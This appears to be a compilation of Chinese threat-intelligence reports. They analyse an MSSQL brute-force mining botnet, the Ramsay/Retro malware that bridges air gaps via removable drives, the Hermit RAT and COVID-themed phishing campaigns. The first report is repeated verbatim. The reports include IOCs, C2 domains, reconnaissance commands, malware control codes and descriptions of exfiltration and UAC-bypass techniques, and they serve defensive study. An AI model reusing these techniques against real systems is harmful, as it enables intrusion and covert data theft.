一、概述

腾讯安全威胁情报中心检测到针对MSSQL服务器攻击的挖矿木马,该挖矿木马主要针对MS SQL服务进行爆破弱口令攻击,爆破成功后会植入门罗币挖矿木马进行挖矿。同时攻击者下载frpc内网穿透工具安装后门,并会添加用户以方便入侵者远程登录该服务器。 

从挖矿木马的HFS服务器计数看,已有上万台MSSQL服务器被植入挖矿木马,另有数十台服务器被安装后门。攻击者在失陷服务器上安装内网穿透工具会进一步增加黑客入侵风险,企业数据库服务器沦陷会导致严重信息泄露事件发生。 

腾讯安全专家建议企业在所有服务器上避免使用弱口令,爆破攻击通常是黑客试水的第一步,使用弱口令非常容易导致企业资产被入侵。腾讯T-Sec终端安全管理系统(御点)已可拦截查杀该挖矿木马。 

二、样本分析

该黑产团伙对mssql服务器进行爆破成功后,会下载执行HFS服务器上的恶意文件,从下载量来看,受感染的服务器有数万台,被植入后门的服务器有数十台,挖矿木马HFS文件列表如下:

Adduser.exe,添加后门账户,用于后续远程登陆。

SQL.exe执行后释放4个文件到c:\windows\Fonts目录中

c:\windows\Fonts\Csrss.exe是NSSM服务封装程序,用于将sqlwriters.exe注册为服务,服务名为SQLServer

Sqlwrites.exe是基于xmrig 6.2的挖矿程序

矿池:

xmr.hex7e4.ru:3333

d2pool.ddns.net:3333

xmr.hex7e4.ru:3333

d2pool.ddns.net:3333

Frp_C.exe执行后释放以下文件到c:\windows\Fonts中

Dllhost.exe是一款开源的内网穿透工具Frpc,Bat负责生成frpc配置文件,以及设置服务启动项,目的是将本机的3389端口暴露给黑客服务器frp.hex7e4.ru,黑客可直接通过RDP连接到受害服务器,进而控制企业内网。

IOCs

Doamin

xxx.hex7e4.ru

xmr.hex7e4.ru

d3d.hex7e4.ru

 IP

43.229.149.62

185.212.128.180

 URLs

hxxp://43.229.149.62:8080/web/Add.exe

hxxp://43.229.149.62:8080/web/AddUser.exe

hxxp://43.229.149.62:8080/web/dw.exe

hxxp://43.229.149.62:8080/web/Frp_C.exe

hxxp://43.229.149.62:8080/web/frpc.exe

hxxp://43.229.149.62:8080/web/frpc.ini

hxxp://43.229.149.62:8080/web/po.jpg

hxxp://43.229.149.62:8080/web/se.jpg

hxxp://43.229.149.62:8080/web/SQL.exe

hxxp://43.229.149.62:8080/web/sqlwriters.jpg

hxxp://43.229.149.62:8080/web/sqlwriters1.jpg

hxxp://43.229.149.62:8080/web/xx.txt

hxxp://43.229.149.62:8080/web/xxx.txt

MD5 

9a745dc59585a5ad76fee0867acd1427

statr.bat

301257a23e2cad9da915cd942c833146

sqlwriters.exe

9a22fe62ebad16edc5c489c9493a5882

Frp_C.exe

88527fecde10ca426680d5baf6b384d1

po.jpg

e27ba54c177c891ad3077de230813373

xxx.txt

2176ecfe4d91964ffec346dd1527420d

xx.txt

f457a5f0472e309c574795ca339ab566

sql.exe

 

一、概述

腾讯安全威胁情报中心检测到针对MSSQL服务器攻击的挖矿木马,该挖矿木马主要针对MS SQL服务进行爆破弱口令攻击,爆破成功后会植入门罗币挖矿木马进行挖矿。同时攻击者下载frpc内网穿透工具安装后门,并会添加用户以方便入侵者远程登录该服务器。 

从挖矿木马的HFS服务器计数看,已有上万台MSSQL服务器被植入挖矿木马,另有数十台服务器被安装后门。攻击者在失陷服务器上安装内网穿透工具会进一步增加黑客入侵风险,企业数据库服务器沦陷会导致严重信息泄露事件发生。 

腾讯安全专家建议企业在所有服务器上避免使用弱口令,爆破攻击通常是黑客试水的第一步,使用弱口令非常容易导致企业资产被入侵。腾讯T-Sec终端安全管理系统(御点)已可拦截查杀该挖矿木马。 

二、样本分析

该黑产团伙对mssql服务器进行爆破成功后,会下载执行HFS服务器上的恶意文件,从下载量来看,受感染的服务器有数万台,被植入后门的服务器有数十台,挖矿木马HFS文件列表如下:

Adduser.exe,添加后门账户,用于后续远程登陆。

SQL.exe执行后释放4个文件到c:\windows\Fonts目录中

c:\windows\Fonts\Csrss.exe是NSSM服务封装程序,用于将sqlwriters.exe注册为服务,服务名为SQLServer

Sqlwrites.exe是基于xmrig 6.2的挖矿程序

矿池:

xmr.hex7e4.ru:3333

d2pool.ddns.net:3333

xmr.hex7e4.ru:3333

d2pool.ddns.net:3333

Frp_C.exe执行后释放以下文件到c:\windows\Fonts中

Dllhost.exe是一款开源的内网穿透工具Frpc,Bat负责生成frpc配置文件,以及设置服务启动项,目的是将本机的3389端口暴露给黑客服务器frp.hex7e4.ru,黑客可直接通过RDP连接到受害服务器,进而控制企业内网。

IOCs

Doamin

xxx.hex7e4.ru

xmr.hex7e4.ru

d3d.hex7e4.ru

 IP

43.229.149.62

185.212.128.180

 URLs

hxxp://43.229.149.62:8080/web/Add.exe

hxxp://43.229.149.62:8080/web/AddUser.exe

hxxp://43.229.149.62:8080/web/dw.exe

hxxp://43.229.149.62:8080/web/Frp_C.exe

hxxp://43.229.149.62:8080/web/frpc.exe

hxxp://43.229.149.62:8080/web/frpc.ini

hxxp://43.229.149.62:8080/web/po.jpg

hxxp://43.229.149.62:8080/web/se.jpg

hxxp://43.229.149.62:8080/web/SQL.exe

hxxp://43.229.149.62:8080/web/sqlwriters.jpg

hxxp://43.229.149.62:8080/web/sqlwriters1.jpg

hxxp://43.229.149.62:8080/web/xx.txt

hxxp://43.229.149.62:8080/web/xxx.txt

MD5 

9a745dc59585a5ad76fee0867acd1427

statr.bat

301257a23e2cad9da915cd942c833146

sqlwriters.exe

9a22fe62ebad16edc5c489c9493a5882

Frp_C.exe

88527fecde10ca426680d5baf6b384d1

po.jpg

e27ba54c177c891ad3077de230813373

xxx.txt

2176ecfe4d91964ffec346dd1527420d

xx.txt

f457a5f0472e309c574795ca339ab566

sql.exe

 

近期,国外安全公司ESET发布了恶意软件Ramsay针对物理隔离网络的攻击报告,本文针对该物理隔离网络的一些攻击进行技术层面的分析。

一、背景

近期,国外安全公司ESET发布了恶意软件Ramsay针对物理隔离网络的攻击报告(见参考链接1)。所谓物理隔离网络,是指采用物理方法将内网与外网隔离,从而避免入侵或信息泄露的风险的技术手段。物理隔离网络主要用来解决网络安全问题,尤其是在那些需要绝对保证安全的保密网、专网和特种网络,机会全部采用物理隔离网络。 

基于腾讯安全威胁情报中心的长期研究跟踪,该 Ramsay恶意文件,跟我们之前跟踪的retro系列的感染文档插件重叠。该波攻击至少从18年就已经开始,并且一直持续到现在。其攻击手段也在不断的进行演化,比如感染的对象从感染doc文件到感染可执行文件,窃取资料的方式从写入可移动磁盘的扇区到写入文档文件末尾等等。事实上,跟ESET的发现类似,我们并未发现太多真实的受控机,因此我们相信该框架还在不断的改进和调试中,暂时并未应用到大规模的攻击活动中。 

事实上,除了Retro系列和Ramsay系列有针对物理隔离网络的攻击外,该团伙早在2015年就已经开始使用Asruex后门来针对隔离网络进行攻击了。Asruex系列同样具有感染doc、pdf、exe等文件的能力。相比Ramsay系列少有感染的机器,Asruex系列的感染量就非常巨大了,直到目前都还有大量的新增机器被感染。当然,该系列后门被认为是购买的HackTeam的工具库。 

本报告仅对针对物理隔离网络的一些攻击进行技术层面的分析,其他的攻击过程和攻击模块不在本文进行讨论和分析。

二、Retro系列

该系列的的感染,我们曾在2018年的文章《“寄生兽”的极地行动》(见参考链接2)中就已经简单的披露,进行感染的模块为初始攻击后下发的一个攻击插件:

该次感染过程主要有两个模块配合完成:

docto.exe:开源工具,用来进行文档的格式转化

infsvc:感染可移动磁盘的中的文档文件,使得感染后的文件为带有CVE-2017-8570漏洞(一种Office高危漏洞,亦称“沙虫”二代漏洞)的rtf文件

此时,完成感染的过程。接下来,当该存有感染后文档的文件,通过可移动磁盘进入到其他设备,甚至物理隔离网络后,若运行感染后的文档文件,就会触发CVE-2017-8570漏洞,进而泄露机器上的敏感信息。

运行感染后的文件后,首先会触发脚本inteldriverupd1.sct:

脚本的功能就为执行最终的恶意文件taskhost.exe。该恶意文件的主要功能为收集信息,然后写入可移动磁盘的扇区中: 

1) 执行以下命令收集系统信息存到%allusersprofile%\CommCache\S-{计算机名}.rtt

systeminfo

tasklist /v

netstat -ano

ipconfig /all

arp -a

route print

sc query wlansvc

netsh wlan show all

netsh wlan showprofiles

netsh wlan showinterface

netsh wlan shownetworks mode=Bssid

2) 遍历本地磁盘,将全部文件目录存到%allusersprofile%\CommCache\C-{时间}.rtt

3) 每5分钟截屏一次,保存到%allusersprofile%\AssemblyDataCache\def{时间}.jpg

4) 加密截屏文件到%allusersprofile%\CommCache\ def{时间}.tmp

收集完所有信息后,会创建%allusersprofile%\CommCache\complete.txt,当检测到complete.txt的时候,会认为收集信息工作已经结束。开始做后续的信息处理:

1)将CommCache目录重命名为CommCache_{rand},并压缩成CommCache_{rand}.zip

2)不断检测可移动磁盘,将CommCache_{rand}.zip内容直接以读写扇区的方式写入磁盘偏移1000000000处,并以HDdE&mE作为标记:

此时,该可移动磁盘上就存有了该设备的相关信息。若该可移动磁盘再度插回到之前被Retro木马攻击的机器上时,这部分数据就会被读取,然后通过其他的收集插件,把这些数据回传到攻击者的服务器上。而在受害者看来,简单使用文件管理器根本看不见该设备存储的秘密数据。 

大致的流程图如下:

三、Ramsay V1系列

在今年的4月初,我们再次发现了一批带有CVE-2017-8570漏洞的文档文件,经过分析研判后,我们发现该批带有漏洞的文档跟Retro系列感染后得文档存在非常多的相似点。因此我们判断为,该批文档文件同样为被感染后的产物,同样为攻击物理隔离网络而生,并且为同一攻击团伙所有。但是遗憾的是,这次我们并未发现原始的感染器文件。

当然跟Retro系列感染后的文档文件相比,该波感染后的文件,在功能上存在相当大的改进点。而存储感染机器的信息的方式也有一定的改变。

执行感染后的文件,同样会触发CVE-2017-8570漏洞,执行脚本OfficeTemporary.sct:

脚本会释放locked.ini、config.ini、slmgr.vbs等文件,最终的恶意文件主要为%allusersprofile%\Identities\netwiz.exe和%windir%\System32\dpnom.dll。其中netwiz.exe主要用来收集机器的信息;dpnom.dll主要用来把收集到的信息写到相应的地方保存。

大致的流程如下:

netwiz.exe收集的信息如下:

1)执行以下命令收集系统信息存到%allusersprofile%\MediaCache\S-{计算机名}.rtt:

systeminfo

tasklist /v

netstat -ano

ipconfig /all

route print

arp -a

reg queryHKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

2)使用开源的powershell脚本%appdata%\Microsoft\Word\winword.ps1,把%appdata%\Microsoft\Word\下所有文档文件转换成TXT文件,并把转换后的TXT文件加密复制到%allusersprofile%\MediaCache\{rand}.dat;

3)打包以下目录所有.lnk文件到\MediaCache\Items_{rand}.db,密码是[email protected]#:

%APPDATA%\Microsoft\Windows\Recent\*.lnk

%APPDATA%\Microsoft\Office\Recent\*.lnk

4)接收Mailslot消息(为dpnom.dll注入的进程为iexplorer.exe,winword.exe时发送的一个消息),当收到消息后保存屏幕到%allusersprofile%\NetCache\def+{时间}.tmp;

而dpnom.dll的主要作用为Hook WriteFile函数,监控到操作的文件为doc的时候,Hook CloseHandle函数,将%allusersprofile%\MediaCache\中的一个文件附加写到即将关闭的doc文件末尾,流程图为:

写入附加信息后的文件:

%allusersprofile%\MediaCache\就是保存netwiz.exe收集到的信息的文件目录。不过值得注意的是:每次写入的内容是上述收集到的信息的文件中随机挑选的一个。因此编辑doc的次数越多,收集到的信息也会越多。

因此,当隔离网中的doc文件,随着可移动磁盘再次回到中转的机器上的时候,攻击者同样能够把隔离网络中的机器的信息给回传回去。

值得注意的是,我们在netwiz.exe还发现了另外一个隐藏的功能,该功能为扫描全盘doc、docx文件,搜索控制指令,根据控制指令进行相应的操作。该功能的目的就是为了完成攻击者对隔离网络中的机器进行控制。由于在隔离网络中无法进行正常的网络通信,因此攻击者为了控制隔离网中的机器,会在外部下发一个控制文档到中转机上,然后跟随可移动磁盘摆渡到隔离网中,因此来完成相应的控制操作。支持的控制指令有:

控制码 调试信息 功能描述
Rr*e#R79m3QNU3Sy ExecuteHiddenExe 执行随后的exe文件
CNDkS_&pgaU#7Yg9 ExecuteHiddenDll 释放插件Identities\\netmgr_%d.dll并加载
2DWcdSqcv3?(XYqT ExecuteHiddenBat 依次执行随后的cmd命令

做为控制的文档结构如下:

四、Ramsay V2系列

除了发现被感染的文档文件外,我们同样还发现了被感染的exe文件。由于在文件中存在Ramsay字符,因此ESET把其命名为Ramsay:

由于跟上面的感染文档文件的版本,无论是代码、路径、功能上都极为类似,因此归属到同一组织。所以把上面的版本称为Ramsay V1系列,该版本称为Ramsay V2系列。

该系列具有感染全盘exe文件的功能,因此同样具备感染隔离网络的能力。完成感染功能的模块为Identities\bindsvc.exe,该感染器的名字跟Retro系列中感染文档的命名也极其类似,都以svc.exe结尾。被感染后的文件结构如下:

执行被感染后的文件后,同样为继续感染该主机上的其他exe文件,实现蠕虫的效果。此外跟上面的Ramsay V1类似,同样会对相关的机器信息进行收集,然后Hook WriteFile和CloseHandle后,对写doc、docx操作时候,把收集到的信息写到文档的尾部。同样的,也会搜索控制文档,对控制文档中的相关指令,进行对应的命令操作。

这部分的功能跟上面V1系列类似,因此不再继续讨论。

五、Retro系列和Ramsay系列的同源分析

除了ESET文章中提到的Retro后门跟Ramsay后门存在非常多的类似点外,我们发现感染后的文件也存在相当多的类似点,包括使用相类似的字符串、获取结果都保存在.rtt文件、解密算法的类同、功能类同等等: 

获取的信息均存储为S-{计算机名}.rtt

截取的屏幕均存储为def-{时间}.rtt

功能上的异同如下表所示:

行为比较 Retro plugin Ramsay V1 Ramsay V2
编译时间 2018 2019 2020
传播途径 感染文档 感染文档 感染exe
信息回传路径 U盘扇区 文档尾部 文档尾部
信息存储文件扩展名 .rtt .rtt .rtt
cmd命令收集信息
获取截屏
遍历磁盘文件
持久化
是否接受控制指令(文件)  
支持插件
全盘感染
内网探测
获取IE临时文件

可以发现,该工具一直在进行更新,且功能越来越趋向性强大和完整。 

值得注意的是,腾讯安全威胁情报中心在2019年发表的文章(见参考链接3),文章中提到的做为攻击母体的”网易邮箱大师”,当时我们认为是通过伪装正常客户端的方式,通过水坑来进行初始攻击。但是从目前掌握的信息来推测,该文件可能同样为感染后的产物:

当然该结论仅为猜测,暂时并无更多的证据。因此若存在错误,烦请各位同行指正。 

六、针对隔离网络攻击的总结

根据上面的分析,我们推测攻击者针对物理隔离网络的感染流程大致如下:

1、通过鱼叉钓鱼、水坑、供应链攻击等方式,初始攻击某台暴露在公网的主机;

2、横向渗透到某台做为中转(该机器用来公网和隔离网络间摆渡文件等功能)的机器上,下发感染文件(包括文档文件、可执行文件等)、收集信息等恶意插件模块;

3、在中转机器上监视可移动磁盘并感染可移动磁盘上的文件;

4、可移动磁盘进入隔离网络。隔离网内的机器若执行被感染的文件,则收集该机器上的相关信息,并写入可移动磁盘的磁盘扇区或文件的文档文件的尾部;

5、可移动磁盘再次插入中转机器上时,中转机器上的其他的恶意插件,对可移动磁盘特定扇区存储的机密信息进行收集,再回传到攻击者控制的服务器中。

6、此外,攻击者还会下发做为控制功能的文件,把相关的指令和操作命令写在控制文件中,然后通过可移动设备摆渡到隔离网络中,再来解析执行。 

至此,完成对隔离网络的完成感染过程。大致的流程图如下:

七、其他的针对隔离网的攻击活动

事实上,早在2015年,该攻击团伙就已经被发现使用Asruex系列后门,来针对隔离网络进行攻击。Asruex系列同样具有感染全盘文件的能力,感染的文件类型包括doc、pdf、exe等:

相较于Retro和Ramsay系列少有感染的机器,Asruex系列的感染量就非常巨大,直到目前,每日都还有大量的新增机器被感染:

如此大的感染量,未必是攻击者最初的目标,毕竟高级威胁攻击是针对性极强的攻击活动,很少是大规模展开的攻击活动。攻击动作太大,感染范围太广反而容易暴露自己。不利于隐藏和后续的攻击活动。好在该版本的C&C服务器早已经失效,因此该系列的木马对受害机器的危害并不大。 

此外,该攻击工具库,疑似为Hacking Team所拥有:

Asruex的C&C为themoviehometheather.com,该域名的注册者为[email protected]

该邮箱注册的域名中,odzero.net曾被报道是Hacking Team所拥有:

而且,该团伙购买HackingTeam的军火库也并非首次,卡巴斯基曾报导过相关的新闻:

这也跟之前曝光的韩国情报官员因为购买HackingTeam间谍软件而自杀的事件相印证:

八、结论

Ramsay为一个功能强大的攻击模块,而且该模块一直保持着更新且功能越来越完善和成熟。好在目前发现的受控设备并不多,但也不排除存在隔离网络中的感染设备未被发现的情况。 

此外,无论是Asruex系列还是Ramsay系列,该攻击团伙至少从2015年开始就已经针对物理隔离网络进行针对性的攻击了,并且依然在不断的开发攻击库。因此针对物理隔离网络的安全建设也是刻不容缓,千万不能因为隔离网络中的机器未与外网通信而掉以轻心。

九、安全建议和解决方案

本次Ramsay恶意软件针对隔离网络环境的攻击,其目的是进行各种网络窃密活动,攻击者将收集到的情报,直接写入移动存储介质的特定扇区,并不在该存储介质上创建容易查看的文件,使得收集行为极具隐蔽性。会对政企机构、科研单位会构成严重威胁。腾讯安全专家建议相关单位参考以下安全措施加强防御,防止黑客入侵增加泄密风险:

1、通过官方渠道或者正规的软件分发渠道下载相关软件,隔离网络安装使用的软件及文档须确保其来源可靠; 

2、谨慎连接公用的WiFi网络。若必须连接公用WiFi网络,建议不要进行可能泄露机密信息或隐私信息的操作,如收发邮件、IM通信、银行转账等;最好不要在连接公用WiFi时进行常用软件的升级操作; 

3、可能连接隔离网络的系统,切勿轻易打开不明来源的邮件附件; 

4、需要在隔离网络环境使用的移动存储设备,需要特别注意安全检查,避免恶意程序通过插入移动介质传播; 

5、隔离网络也需要部署可靠的漏洞扫描及修复系统,及时安装系统补丁和重要软件的补丁; 

6、使用腾讯电脑管家或腾讯御点终端安全管理系统防御病毒木马攻击; 

7、推荐相关单位部署腾讯T-Sec高级威胁检测系统(御界)捕捉黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) 

十、附录

1.IOCs

MD5:

92480c1a771d99dbef00436e74c9a927 infsvc.exe

dbcfe5f5b568537450e9fc7b686adffd  taskhost.exe

03bd34a9ba4890f37ac8fed78feac199 bindsvc.exe

URL:

http://themoviehometheather.com

2.参考链接

1) https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/

2) https://s.tencent.com/research/report/465.html

3) https://s.tencent.com/research/report/741.html

*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM

一、概述

两年前,腾讯安全威胁情报中心曝光了SYSCON/SANNY木马的活动情况,并且根据关联分析确定跟KONNI为同一组织所为。该组织的攻击对象包括与朝鲜半岛相关的非政府组织、政府部门、贸易公司、新闻媒体等。

SYSCON/SANNY木马是一个非常有特色的远程控制木马,通过ftp协议来进行C&C控制,该后门的主要攻击目标为朝鲜半岛相关的重要政治人物或者要害部门,偶尔也会针对东南亚等国进行攻击。该活动自2017年下半年开始活跃,并且对多个目标进行了攻击活动。被曝光后,该组织活动没有任何减弱的迹象。腾讯安全威胁情报中心根据该组织的特点,在2018年12月将其命名为“Hermit(隐士)”。

2020年,“Hermit(隐士)”APT组织依然保持较高的活跃度,攻击方式和木马行为上也有了较大的更新,因此我们对近期的攻击活动做一个整理,并对木马的一些更新情况做一个详细分析汇总。

二、诱饵

使用带有恶意Office宏代码的攻击诱饵依然是SYSCON/SANNY最常用的攻击方式,此外通过修改字体颜色来伪装宏代码的恶意行为也是该组织的特点之一,该特点一直保持至今。而诱饵的主题依然是紧贴时事热点,尤其是全球新冠疫情(COVID-19)热点以及朝鲜半岛相关的局部热点事件。

例如3月份“Hermit(隐士)”组织使用“口罩仅建议用于照顾COVID-19病人的人使用”的文档标题作为攻击诱饵。

“Hermit(隐士)”使用新冠疫情(COVID-19)口罩话题为诱饵

“Hermit(隐士)”组织使用2020年东京残奥会捐助相关的诱饵

“Hermit(隐士)”组织伪装成2020年朝鲜政策相关话题为诱饵

“Hermit(隐士)”组织使用朝鲜Covid-19疫情相关主题为诱饵

二、恶意宏代码分析

携带恶意宏代码的恶意Office文件几乎是该组织的唯一攻击方式,多数诱饵会在未启用宏的情况下在诱饵文件中显示诱导内容,诱导用户启用宏,在未启用宏的情况下字体为几乎无法查看的灰色。

诱导受害者启用恶意宏代码查看文档

多数诱饵的vba宏代码使用密码保护

宏代码中会调整图片大小以及修改字体颜色,用来隐藏真实的恶意行为

最新的攻击宏代码主要恶意行为是释放一个PE文件,并创建进程执行,执行时会将配置的CC信息作为命令行参数传递给恶意进程。

释放PE文件相关宏代码之一

释放PE文件相关宏代码之二

三、downloader&install过程分析

释放出的PE文件是一个downloader木马,其主要功能是从命令行参数中提取URL,并进行一系列的下载、解压和安装行为,以下以最新版本的文件up.exe(a83ca91c55e7af71ac4f712610646fca)作为样本进行详细分析。

up.exe行为:

1)首先从参数中取出URL,然后判断操作系统是32位还是64位,如果32位则下载2.dat、64位下载3.dat下载完成后将其解密成temp.cab,随后执行expand命令对cab进行解压释放

downloader主要功能函数

2)cab内容如下,主要包含一个安装bat文件、一个RAT dll文件、一个ini文件

cab压缩包内容

3)检查当前进程权限,不同权限不同处理方式

进程权限检测相关代码

4)如果不是TokenElevationTypeLimited权限,即管理员用于以非管理员权限运行程序,则直接winexec执行install.bat,如果是TokenElevationTypeLimited则判断cmd.exe的版本,根据版本不同执行不同的UAC bypass策略,共内置了三种绕过UAC的方式。

根据cmd版本信息使用不同的UAC bypass方案

5)UAC bypass方式一相关代码

UAC bypass方式一

6)UACbypass方式二相关代码

UAC bypass方式二

7)UAC bypass方式三相关代码

UAC bypass方式三

8)install.bat的功能就是将wprint.dll和wprint.ini复制到system32目录,并创建服务持久化dll

install.bat

四、RAT行为详细分析

1,首先判断目录下是否有dll同名的dat文件,如果有则读取并解密出配置信息,如果没有则读取同名的ini文件,即wprint.ini并解密,解密得到URL后进行不断尝试下载dat

解密ini获取url下载dat相关代码

2、wprint.ini解密结果如下:是一个url,使用URLDownloadToFile进行下载后存为wprint.dat

解密后的ini内容

3)读取wprint.dat并解密,得到包括ftpserver、username、password在内的配置信息

从dat从提取配置信息相关代码

4)根据配置信息连接ftpserver,并将server上的htdocs设置为当前目录,在其中创建一个以本地computername加密后的字符串为名称的新目录

连接ftpserver、创建目录相关代码

5)先后执行cmd /c systeminfo >temp.ini、cmd /c tasklist > temp.ini两个命令收集计算机信息和进程列表,加密上传temp.ini文件到ftpserver并以ff mm-dd hh-mm-ss.txt的时间格式命名。

执行命令获取信息相关代码

6)ftp上传文件相关代码,除了.cab、.zip、.rar外的其他扩展名文件均会被压缩成.cab后加密上传

上传信息、文件相关代码

7)依次下载ftpserver上的cc(x)文件到本地解析指令进行命令分发,x为从0开始依次自增的整数

获取控制指令相关代码

获取控制指令相关代码

8)命令文件格式为开头“#”字符与第二个“#”之间的为下发的文件内容,第二个“#”之后的为指令内容

解析控制文件cc相关代码

9)控制指令列表如下:主要完成cmdshell和文件上传下载执行的功能

指令参数1 指令参数2 指令参数3 功能 cmd /c 带pull 带/f 将目标文件复制到%temp%\temp.ini,上传temp.ini 不带/f 直接上传指定文件 带put 将下载的文件移动到指定位置 带> cmdshell 结果输出到temp.ini 不带> cmdshell /user 带/stext或> 使用user权限执行下载的文件,输出结果到temp.ini 不带/stext或> 使用user权限执行下载的文件 带/stext 执行下载的文件输出结果到temp.ini 不带/stext 执行下载的文件

指令参数1 指令参数2 指令参数3 功能
cmd /c 带pull 带/f 将目标文件复制到%temp%\temp.ini,上传temp.ini
不带/f 直接上传指定文件
带put 将下载的文件移动到指定位置
带> cmdshell 结果输出到temp.ini
不带> cmdshell
/user 带/stext或> 使用user权限执行下载的文件,输出结果到temp.ini
不带/stext或> 使用user权限执行下载的文件
带/stext 执行下载的文件输出结果到temp.ini
不带/stext 执行下载的文件

命令参数表

10)cmd /c指令相关处理代码如下

cmd命令相关代码

11)/user指令相关处理代码如下

user命令相关代码

12)其他指令处理代码如下

其他命令相关处理代码

四、版本变化

SYSCON/SANNY的活动最早可追溯到2017年,使用ftp协议作为RAT控制协议的木马是该组织最早使用也是最长使用的手法,与之前版本的木马相比,近期攻击所使用的木马有以下升级点:

  老版本 新版本
下载解密 利用系统组件certutil.exe进行下载解密 自己编写的downloader和解密代码
UAC bypass 一个专门的dll中一种bypass方法 集成在downloader中,三种bypass方法
加解密 文件名字符串、CC传输文件未加密 对包括所有字符串、与CC传输的文件都加密了
控制文件 everyone(0) cc(0)
RAT指令 有对chip控制指令的处理 没有对chip控制指令的处理

五、附录IOC

HASH

guidance.doc:

677e200c602b44dc0a6cc5f685f78413

123.doc:

40e7a1f37950277b115d5944b53eaf3c

Keepan eye on North Korean cyber.doc:

1a7232ef1386f78e76052827d8f703ae

KinzlerFoundation for 2020 Tokyo Paralympic games.doc:

faf6492129eeca2633a68c9b8c2b8156

ce26d4e20d936ebdad92f29f03dfc1d9

7e71d5a0f1899212cea498bbda476ce8

a83ca91c55e7af71ac4f712610646fca

77f46253fd4ce7176df5db8f71585368

62e959528ae9280f39d49ba5c559d8fb

C2

phpview.mygamesonline.org

firefox-plug.c1.biz

win10-ms.c1.biz

ftpserver:myview-202001.c1.biz

username:3207035

password:[email protected]

六、相关链接

https://mp.weixin.qq.com/s/rh4DoswLUNkS8uiHjrFU9A

https://mp.weixin.qq.com/s/CBh2f-lfG5H4wcoj5VSfEw

https://mp.weixin.qq.com/s/F2-DLtuHUkV_nCnKwp44_Q

*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM

一、概述 

目前,由新型冠状病毒引起的肺炎疫情(COVID-19)在全球蔓延,已有190个国家存在确诊病例,全球确诊人数已经超过43万人,死亡病例超过1.9万。中国大陆已基本控制住疫情,但在意大利、西班牙、美国等发达国家疫情仍处于爆发期,世界卫生组织已将疫情的全球风险级别确定为“非常高”。

而随着新冠病毒疫情(COVID-19)在全球蔓延,以此为主题的网络攻击事件骤然增长。其中中国大陆、意大利、韩国等国家成为黑客网络攻击的高风险地区。腾讯安全威胁情报中心自疫情爆发后,已检测到多起以新冠病毒疫情为主题的攻击活动。

攻击者大多以投递邮件的方式,构造诱饵文件欺骗用户点击,恶意文件类型多种多样,覆盖EXE、MS Office宏文档、漏洞文档、lnk文件、VBS脚本等。而攻击的背景也包括具有国家背景的专业APT组织和普通黑产组织。本文对近期发现的以新冠病毒疫情为诱饵的攻击活动加以汇总,供大家参考。在此提醒广大政企单位和个人用户,在做好疫情防控的同时,也要做好网络安全的防护工作。

二、近期活跃的APT攻击及其他黑产

1.  具有国家背景的专业APT攻击

1)  海莲花(APT32)组织

海莲花,又称APT32、OceanLotus,被认为是具有越南国家背景的攻击组织。该组织自发现以来,一直针对中国的政府部门、国企等目标进行攻击活动,为近年来对中国大陆进行网络攻击活动最频繁的APT组织。腾讯安全威胁情报中心在2019年也多次曝光了该组织的攻击活动。

自新冠疫情爆发以来,该组织正变本加厉对中国大陆相关目标进行网络攻击活动。攻击方式依然采用鱼叉邮件攻击,钓鱼邮件同样使用跟新冠病毒疫情相关的诱饵文档。如:

攻击诱饵包括lnk文件、白加黑攻击方式等:

技术细节跟之前曝光的变化不大,本文不再过多描述。

除了投递恶意木马外,海莲花还是用无附件攻击,用来探查用户的一些信息:

也有附件和探针一起的:

2)  蔓灵花(BITTER)组织

蔓灵花也是对中国大陆进行攻击的比较频繁的一个攻击组织,其目标包括外交部门,军工、核能等重点企业。

在疫情爆发后,该组织同样采用了跟疫情相关的诱饵来对一些目标进行攻击:

最终释放的特种木马为2019年才开始采用的C#木马:

3)  Kimsuky组织

Kimsuky组织被认为是来自东亚某国的攻击组织,该组织一直针对韩国政府部门、大学教授等目标进行攻击活动。Kimsuky组织为韩国安全厂商命名,腾讯安全威胁情报中心在2018、2019均披露过的Hermit(隐士)同属该攻击组织。

在2020年2月底到3月初期,韩国是除中国大陆外受疫情影响最严重的国家。于是Kimsuky十分活跃,开始利用疫情相关的诱饵,对韩国目标进行攻击活动。同时我们发现,该组织还同时具备多平台的攻击能力。

此外,该组织还针对MacOS进行攻击:

最终的恶意文件使用python编写,用来收集用户信息,和C&C进行通信来获取命令等:

4)  TransprentTribe组织

TransparentTribe APT组织,又称ProjectM、C-Major,是一个来自巴基斯坦的APT攻击组织,主要目标是针对印度政府、军事目标等。腾讯安全威胁情报在2019年也多次曝光该组织的一些攻击活动。

虽然新冠病毒疫情暂时还未在印度爆发,但是印度也已经在进行一些疫情相关的防控举措,包括关闭国门,加强检疫等等。但是网络攻击不会因此而停止,攻击者同样借助疫情相关资讯进行攻击活动。如:

执行后的宏代码为:

最终执行的木马为CrimsonRAT,归属为TransparentTribe:

2.  其他网络黑产活动

包括白象、毒云藤、gamaredon等APT组织近期均使用过新冠疫情相关诱饵对特定目标进行攻击。由于已经有大量报告针对该些活动的分析,本文就不再罗列。

1)  网络诈骗

网络诈骗也是网络攻击活动中的一种,在疫情爆发之后,腾讯安全威胁情报中心检测到多次使用疫情有关的内容进行恶意诈骗的案例。如:

在该案例中,借口让人捐款来研发疫苗,诱使收件人进行比特币转账。所幸,该诈骗活动并未有人上当:

2)  投递窃密木马

群发垃圾邮件投递窃密木马也是近期黑产惯用的一些手法,如下:

Hancitor木马

假冒保险**信息

TA505

假冒COVID-19 FAQ的诱饵文档,欺骗目标用户启用宏代码。

商贸信

假冒世卫组织发送诈骗邮件投递商业木马。

3)  其他窃取隐私的黑产

压缩包中隐藏恶意脚本文件,使用与冠状病毒有关的文件名。

最终释放的窃密木马功能包括cookie窃取、键盘记录、上传下载文件等。

4)  勒索病毒

近期检测到勒索病毒主要为两种:

一种为使用新冠疫情为诱饵传播勒索病毒,如CORONAVIRUS_COVID-19.vbs,最终释放Netwalker勒索病毒

另外一种勒索病毒直接将自己命名为新冠病毒:

三、总结和建议

从本文罗列的以新冠疫情(COVID-19)有关的攻击活动可以看到,网络攻击会紧跟社会热点,精心构造跟时事、热点有关的资讯作攻击诱饵,诱使目标用户点击再植入恶意文件或者进行网络诈骗活动。

